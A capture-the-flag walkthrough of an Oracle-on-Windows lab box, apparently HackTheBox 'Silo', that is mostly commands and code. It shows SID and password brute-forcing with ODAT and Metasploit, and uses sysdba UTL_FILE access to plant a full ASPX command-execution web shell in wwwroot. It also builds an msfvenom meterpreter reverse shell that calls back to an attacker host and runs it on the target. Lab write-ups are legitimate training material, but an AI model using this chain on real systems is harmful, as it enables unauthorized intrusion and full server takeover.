Nmap scan

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Since its running a Oracle DB service, I can either use metasploit or odat. I will be showing both.

ODAT

Once installed, I will start the ODAT sidguesser to find potental SIDs to brute force

ODAT sidguesser

./odat.py sidguesser -s 10.10.10.82 -p 1521

Metasploit sid_brute

use auxiliary/scanner/oracle/sid_brute
[+] 10.10.10.82:1521      - 10.10.10.82:1521 Oracle - 'XE' is valid

The odat passwordguesser uses a outdated wordlist thats all caps, so I will be using the metasploit wordlist

cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt .
mv oracle_default_userpass.txt accounts/accounts.txt

Since oracle_default_userpass.txt has spaces between, I will be using regex to remove those spaces

With vim: :%s/ /\//g

Now run the ODAT passwordguesser

./odat.py passwordguesser -s 10.10.10.82 -d XE
[+] Valid credentials found: scott/tiger.

Manual method of obtaining low priv shell

Now access the oracle database
sqlplus64 scott/[email protected]:1521/XE

SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE TABLE
CREATE CLUSTER
CREATE SEQUENCE
CREATE PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE

9 rows selected.

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Access the DB as a system admin
sqlplus64 scott/[email protected]:1521/XE as sysdba

Read the default iis page from DB

declare 
        f utl_file.file_type;
        s varchar(200);
begin
        f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
        utl_file.get_line(f,s);
        utl_file.fclose(f);
        dbms_output.put_line(s);
end;
SQL> set serveroutput ON
SQL> /
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

PL/SQL procedure successfully completed.

Write a file to wwwroot

declare
        f utl_file.file_type;
        s varchar(5000) := 'Test';
begin
        f := utl_file.fopen('/inetpub/wwwroot', 'helloworld.txt','W');
        utl_file.put_line(f,s);
        utl_file.fclose(f);
end;

Using ‘/usr/share/webshells/aspx/cmdasp.aspx’ Need to modify to make the file smaller

Cut out new line: sed -z 's/\n//g' cmdasp.aspx

Modified aspx shell

<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>

The DB query

declare
        f utl_file.file_type;
        s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
        f := utl_file.fopen('/inetpub/wwwroot', 'shell.aspx','W');
        utl_file.put_line(f,s);
        utl_file.fclose(f);
end;

Obtaining system priv shell using ODAT

Generate a exe using msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=5555 -f exe -o shell.exe

Uploading our malcious exe to the /temp folder on the victim machine
./odat.py utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile /temp shelly.exe ../shell.exe

Now execute the exe uploaded on the victim machine (After the metasploit listener is setup)
./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec /temp shelly.exe

user.txt: 92ede778a1cc8d<redacted>
root.txt: cd39ea0af657a4<redacted>

Additional Privesc methods

Rotten Potato RottenPotatoGithub

Dropbox -> .dmp -> volatility -> extract NTLM hash of users